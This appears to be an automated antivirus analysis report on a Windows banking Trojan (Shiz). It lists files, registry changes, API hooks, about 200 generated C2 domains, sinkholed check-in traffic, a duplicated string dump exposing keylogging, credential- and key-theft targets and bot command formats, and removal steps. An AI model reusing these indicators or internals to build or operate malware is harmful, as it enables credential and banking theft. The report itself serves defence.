MD5: e73d84408e2b7fe6e947639aae5fdfd0
SHA1: ed50a2905e14c8f451d094fd510ca11001929e84
SHA256: 012032ca8c622859fb30101eef84d75e62c3acae074c2a6f8dfc295745004fde
SSDeep: 6144:hJq7LCU0Kq998YpLr1hoAwC5kw5uLPB2J6Q7zspekOtCzaghT3jilNrMqC:hACU0R/3pLrQdIkOuzop7zsgCzV13j8M
Size: 268800 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1993-11-04 22:02:17
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:216

The Trojan injects its code into the following process(es):

Explorer.EXE:1948

File activity

The process %original file name%.exe:216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\AppPatch\kndaxn.exe (1961 bytes)
%System%\config\software (3028 bytes)
%System%\config\software.LOG (5300 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)

Registry activity

The process %original file name%.exe:216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 62 74 A2 B5 F2 6F A5 74 12 E6 AB ED 61 FD E5"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\kndaxn.exe_, \??\%WinDir%\apppatch\kndaxn.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"d8cc41db" = "CêkæÚ`Ã¥D 5õÔPçG]Â¥q&e4¹à”¸a4d‚\yìqA}(Äé¼ü4|Âá@
”°™,¡¤üHrѼ©€©”´D0}éiXª¸|Èy4¡RYÑúièmÑ
©È„IáØð±¼(¤ ádIÚبìd˜ XYâÀeœiü¥AšIi¸r¥(¡A\y 9€éñ$ZÔaxÙ9

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExW
HttpSendRequestExA
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
InternetQueryDataAvailable
InternetCloseHandle
InternetReadFile

The Trojan installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

Company Name: Desiccatory
Product Name: Pinup
Product Version: 3.1.6.3
Legal Copyright: politicize overfelon
Legal Trademarks: Brakehead
Original Filename:
Internal Name:
File Version: 3.9.5.9
File Description: aqueoigneous Muslinet
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://xukovoruput.eu/login.php	166.78.144.80
cidohukigeq.eu
gatonazytab.eu
cihipifebep.eu
foqilozutoz.eu
tuwypagupeb.eu
divoxehaceb.eu
qekenilacap.eu
fotyriwavix.eu
jenokirifux.eu
kevedorozup.eu
xubeqidudyh.eu
tufecagemyl.eu
jepogejebak.eu
nojibukojoj.eu
gacezobeqon.eu
cidyrecavok.eu
novacofebyz.eu
jeceraxaxol.eu
kemawonywig.eu
jewezexigaf.eu
kejycirenuh.eu
fodutazenaf.eu
cihakotihuz.eu
qetaseqyquv.eu
gahocuwalyc.eu
fogynahidal.eu
mavasatokyf.eu
magymofigeg.eu
pumumagojef.eu
lysygyjytad.eu
lygujirupum.eu
xudosorihug.eu
rylicepyryf.eu
xuxukanoluf.eu
tucyzogojat.eu
pufiluqudic.eu
tufigolidat.eu
tupudyqusuj.eu
jefubonokiz.eu
cicucifokym.eu
lymosudyqym.eu
jelaqirozum.eu
jefejurenyp.eu
rynenogupez.eu
vopepukaxej.eu
lyvitexemod.eu
puvybivihox.eu
galupehudev.eu
dimevuwevuj.eu
xuxusujenes.eu
puzecypigyw.eu
pupatololoz.eu
cilyzycojod.eu
xuxanexusov.eu
pujuduvaxim.eu
citifemifif.eu
rynudepebur.eu
qetuluvolos.eu
xutityjigac.eu
ryqyqequsud.eu
cicafykemaj.eu
pumelilebon.eu
disumesenyv.eu
dikatahyqar.eu
qedixogazen.eu
qebahilojam.eu
jenupydaces.eu
qeqekepokul.eu
qeqotogemet.eu
xudylenyrob.eu
kemygexaxab.eu
dixesywyruc.eu
maravatudur.eu
marugofazez.eu
ryleryqacic.eu
dirosehijel.eu
mamixikusah.eu
gaquviwyrup.eu
vojugycavov.eu
ciqanukaxas.eu
lygananavof.eu
puvojyqevus.eu
kefaxyjebav.eu
novugukupap.eu
voworemoziv.eu
xuguxujytej.eu
qedefulywoh.eu
kezubaxemor.eu
lyrefanyril.eu
cinivamolil.eu
mamyfycoliq.eu
qegovyqaxuk.eu
gaciduwifuh.eu
fotoxysupyd.eu
ganofazigor.eu
kezapyjolek.eu
rycovuvutiq.eu
cilodamenub.eu
kejitanokon.eu
tunicyqokuv.eu
puzigagacal.eu
noralycifok.eu
nofotycywos.eu
qeburuvenij.eu
tunarivutop.eu
nopiwatyqul.eu
jejomejoled.eu
fobykuwyruq.eu
jepycudijyq.eu
lyvevonifun.eu
nomojatudyn.eu
tulekuvigij.eu
gaqehysohec.eu
tujajepifyv.eu
foqaqehacew.eu
gaduzehokar.eu
kepolonavit.eu
lykemujebeq.eu
rytahagemeg.eu
digegazolan.eu
kerijudacyj.eu
xuquranifir.eu
nomebemenid.eu
disafuwokis.eu
lymunyjigak.eu
nopexifigep.eu
ryqofuvenoc.eu
vopibycywow.eu
maxotikojax.eu
ryhuzilywax.eu
ryhoqagoxyr.eu
dixilibaxop.eu
kepypirutyx.eu
vofomifyrex.eu
volojifebeh.eu
digowibymih.eu
gaherobusit.eu
xugefexojow.eu
pupujeguper.eu
dikujysozyk.eu
tulimolywan.eu
rydekyqyquw.eu
kevimudyqec.eu
ryturilidom.eu
jewidonevin.eu
purowuqokuq.eu
fogisysemyq.eu
rycypolavag.eu
vonezukemac.eu
volyrukupoq.eu
gatykibojig.eu
masenucifoc.eu
mavulymupiv.eu
xukyhudokex.eu
fodavibusim.eu
qekusagigyz.eu
fokafobeqix.eu
keretejuraw.eu
xubolyjazaq.eu
tujybuqeqis.eu
foxehehywef.eu
nofucemihub.eu
xuqaxiraxyx.eu
magalukacom.eu
norumikemem.eu
citeqotacyn.eu
cinyhotyqyt.eu
masijemaxud.eu
ganycyhywek.eu
lykolexusol.eu
lyxaxududes.eu
vojeqamutuf.eu
vofydatacut.eu
qexyqapevyb.eu
fokuquwifys.eu
maxyjofytyt.eu
lyxuworenuz.eu
tuwobiloloh.eu
vowucotyqyg.eu
tucoqepyryk.eu
qexofyqihid.eu
vocakemenir.eu
nozydemutik.eu
pujoxolufag.eu
jeluganusog.eu
nojepofyren.eu
jecijyjudew.eu
gadaqusupyj.eu
makiwemihiw.eu
lyrimirohyp.eu
pufepepazyd.eu
dirynozebot.eu

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET TROJAN Known Sinkhole Response Header

Traffic

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Date: Sat, 03 May 2014 11:14:55 GMT

Server: Apache/2.2.20 (Ubuntu)

X-Sinkhole: malware-sinkhole

Vary: Accept-Encoding

Content-Length: 0

Content-Type: text/html

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Date: Sat, 03 May 2014 11:14:24 GMT

Server: Apache/2.2.20 (Ubuntu)

X-Sinkhole: malware-sinkhole

Vary: Accept-Encoding

Content-Length: 0

Connection: close

Content-Type: text/html

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: http://www.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

http://

https://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

www.bing.com

www.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

ftp://%s:%s@%s:%i

ftp://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

55

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Explorer.EXE_1948_rwx_025B0000_000B8000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: http://www.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

http://

https://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

www.bing.com

www.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

ftp://%s:%s@%s:%i

ftp://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

SYSTEM!XP2!89D4A5A6

%WinDir%\apppatch\kndaxn.exe

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

55

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:216
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\AppPatch\kndaxn.exe (1961 bytes)
   %System%\config\software (3028 bytes)
   %System%\config\software.LOG (5300 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.